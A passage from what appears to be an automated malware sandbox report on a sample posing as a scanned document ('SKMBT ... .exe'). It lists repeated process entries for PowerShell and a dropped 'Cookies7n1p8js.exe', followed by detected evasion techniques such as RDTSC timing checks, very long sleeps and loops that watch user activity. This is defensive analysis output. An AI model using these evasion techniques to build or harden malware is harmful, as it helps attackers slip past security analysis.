C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX

#### Malware Analysis System Evasion:

 Tries to detect virtualization through RDTSC time measurements Show sources
 Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe RDTSC instruction interceptor: First address: 0000000000407244 second address: 000000000040724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe RDTSC instruction interceptor: First address: 00000000004074AE second address: 00000000004074B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc Source: C:\Windows\SysWOW64\wscript.exe RDTSC instruction interceptor: First address: 00000000005C7244 second address: 00000000005C724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc Source: C:\Windows\SysWOW64\wscript.exe RDTSC instruction interceptor: First address: 00000000005C74AE second address: 00000000005C74B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe RDTSC instruction interceptor: First address: 0000000000407244 second address: 000000000040724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe RDTSC instruction interceptor: First address: 00000000004074AE second address: 00000000004074B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc Source: C:\Windows\SysWOW64\explorer.exe RDTSC instruction interceptor: First address: 0000000000637244 second address: 000000000063724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc Source: C:\Windows\SysWOW64\explorer.exe RDTSC instruction interceptor: First address: 00000000006374AE second address: 00000000006374B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
 Contains functionality for execution timing, often used to detect debuggers Show sources
 Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 5_2_004073E0 rdtsc 5.20041e+07
 Contains long sleeps (>= 3 min) Show sources
 Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Thread delayed: delay time: 922337203685477 Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Thread delayed: delay time: 922337203685477 Jump to behavior Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Thread delayed: delay time: 922337203685477 Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Thread delayed: delay time: 922337203685477
 Found a high number of Window / User specific system calls (may be a loop to detect user behavior) Show sources
 Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3420 Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1431 Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3629 Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1275
 Found large amount of non-executed APIs Show sources
 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe API coverage: 3.9 %